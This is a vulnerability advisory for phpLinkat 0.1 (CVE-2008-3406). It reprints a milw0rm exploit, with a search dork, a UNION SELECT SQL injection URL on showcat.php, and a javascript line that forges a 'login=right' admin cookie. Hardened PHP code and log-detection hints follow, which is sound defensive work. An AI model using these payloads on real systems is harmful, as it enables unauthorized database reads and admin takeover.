phpLinkat SQL Injection and Cookie Authentication Bypass Vulnerabilities

Vulnerability ID: 1115761    Vulnerability type: SQL injection
Published: 2008-07-26    Updated: 2009-01-29
CVE ID: CVE-2008-3406    CNNVD ID: CNNVD-200807-496
Platform: PHP    CVSS score: 7.5
|Vulnerability Source
https://www.exploit-db.com/exploits/6140
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200807-496
|Vulnerability Details
showcat.php in phpLinkat 0.1 contains a SQL injection vulnerability. A remote attacker can execute arbitrary SQL statements via the catid parameter.
|Vulnerability EXP
######## ##    ##  ######  ########  ##    ## ########  ########  #######  ######## 
##       ###   ## ##    ## ##     ##  ##  ##  ##     ##    ##    ##     ## ##     ##
##       ####  ## ##       ##     ##   ####   ##     ##    ##           ## ##     ##
######   ## ## ## ##       ########     ##    ########     ##     #######  ##     ##
##       ##  #### ##       ##   ##      ##    ##           ##           ## ##     ##
##       ##   ### ##    ## ##    ##     ##    ##           ##    ##     ## ##     ##
######## ##    ##  ######  ##     ##    ##    ##           ##     #######  ######## 
################################ !R4Q!4N H4CK3R  ###################################
#
# phpLinkat 0.1 Insecure Cookie Handling Vulnerability & Sql Injection Exploit
#
# Found By : Encrypt3d.M!nd
#              encrypt3d.blogspot.com
#
# Dork : "Powered by DesClub.com - phpLinkat"

# Description :
  
   phpLinkat is a free link indexing script written in PHP and
   runs on MySQL. This script is suffering from a sql injection bug
   and insecure cookie handling.

# phpLinkat : Sql Injection Exploit
    PoC :www.site.com/phpLinkat/showcat.php?catid=666%20union%20select%20concat(version(),0x3a,database(),0x3a,user()),2,3,4,5,6/*

# phpLinkat : Insecure Cookie Handling
 
  /admin/login2.php: 
  6 : if( ($username == $cpusername) && ($password == $cppassword) ){
  7 :  setcookie("login","right");  <<< wtf!!
  8 :  echo <<<EOF
 Exploit:
  javascript:document.cookie = "login=right; path=/;";
  Then go to "phplinkat/admin/", and have fun ^_^

#End 

# milw0rm.com [2008-07-26]
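The two defects above (raw catid reaching the query in showcat.php, and a client-settable "login=right" cookie standing in for admin authentication in admin/login2.php) are both classic patterns with well-known fixes. The following is an added example written for this page, not phpLinkat's own code: it shows each weak pattern as reconstructed from the advisory next to a hardened form. The table and column names (links, id, title, url), the mysqli connection variable, the session key name and the assumption that the configured admin password is stored as a password_hash() value are all assumptions; the original file layout is not on the page.

```php
<?php
// Added example (not phpLinkat's own code). Names marked "assumed" are not
// taken from the advisory or the original source.

// ---- 1. showcat.php: the catid parameter must never reach SQL as raw text ----

// Weak pattern, reconstructed from the advisory's description (assumed table
// name "links"): the GET parameter is interpolated straight into the query,
// so anything after the number becomes part of the SQL statement.
function showcat_weak(mysqli $db, array $get)
{
    $catid = $get['catid'] ?? '';
    return $db->query("SELECT * FROM links WHERE catid = $catid");
}

// Hardened form: validate the type first, then bind it as a parameter.
// Even if validation were skipped, the prepared statement keeps the value
// out of the query text.
function showcat_hardened(mysqli $db, array $get)
{
    // Category ids are positive integers; reject anything else before the DB is touched.
    $catid = filter_var(
        $get['catid'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($catid === false) {
        http_response_code(400);
        exit('invalid catid');
    }
    // Assumed column names; the point is the placeholder and typed binding.
    $stmt = $db->prepare('SELECT id, title, url FROM links WHERE catid = ?');
    $stmt->bind_param('i', $catid);
    $stmt->execute();
    return $stmt->get_result();
}

// ---- 2. admin/login2.php: login state must not be a client-controlled cookie ----

// The advisory's line 7, setcookie("login","right"), lets any client that
// sets that cookie by hand pass the admin check, because the server trusts a
// value it never signed or stored. Server-side session state replaces it.

// Cookie flags for the session cookie (array form needs PHP 7.3+).
session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);
session_start();

// $cppasswordHash is assumed to hold a password_hash() result rather than the
// plaintext the original config appears to use.
function login_hardened(string $username, string $password,
                        string $cpusername, string $cppasswordHash): bool
{
    $userOk = hash_equals($cpusername, $username);   // constant-time compare
    $passOk = password_verify($password, $cppasswordHash);
    if (!$userOk || !$passOk) {
        return false;
    }
    session_regenerate_id(true);   // new session id after the privilege change
    $_SESSION['admin'] = true;     // assumed session key; lives only server-side
    return true;
}

// Every page under admin/ calls this instead of inspecting a "login" cookie.
function require_admin(): void
{
    if (empty($_SESSION['admin'])) {
        header('Location: login.php');
        exit;
    }
}
```

The detection side follows from the same two facts: a web-server access log showing showcat.php requests whose catid is not a plain integer, or admin/ requests arriving with a login cookie but no preceding login2.php POST, is the signal to look for when assessing an exposed phpLinkat 0.1 install.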
|References

Source: XF
Name: phplinkat-showcat-sql-injection(44060)
Link: http://xforce.iss.net/xforce/xfdb/44060
Source: BID
Name: 30386
Link: http://www.securityfocus.com/bid/30386
Source: MILW0RM
Name: 6140
Link: http://www.milw0rm.com/exploits/6140
Source: SREASON
Name: 4087
Link: http://securityreason.com/securityalert/4087